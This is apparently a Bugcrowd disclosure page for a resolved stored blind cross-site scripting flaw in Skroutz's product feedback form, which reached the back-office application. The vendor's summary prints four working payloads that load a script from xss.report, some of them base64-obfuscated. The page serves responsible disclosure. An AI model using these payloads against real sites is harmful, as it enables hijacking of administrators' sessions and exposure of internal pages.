Blind Cross-Site Scripting (XSS) in SKU/product/shop reviews/feedback

Disclosed by
rawezh_1
  • Engagement Skroutz Public Managed Bug Bounty
  • Disclosed date over 1 year ago
  • Points 10
  • Priority P3 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by Skroutz Public Managed Bug Bounty

Mr. @rawezh_1 has identified a Stored Blind Cross-Site Scripting Vulnerability that affects our application.
More specifically our product feedback form reflected the stored JavaScript code back to our back-office application giving the attacker visibility of internal pages and users and/or potential limited scope code execution, requiring a human action.
The payload is straightforward similarly to the examples below:

'"><script src=//xss.report/s/rawezh123></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3Jhd2V6aDEyMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
javascript:eval('var a=document.createElement(\'script\');a.src=\'//xss.report/s/rawezh123\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3Jhd2V6aDEyMyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>

To verify the payload trigger, the xss.report domain was used.
Thanks to Mr. @rawezh_1 we were able to pinpoint and fix the issue in a timely manner.

Summary by rawezh_1

this submission about blind XSS that I found on feedback product now this vulnerability fixed thanks for the team

Activity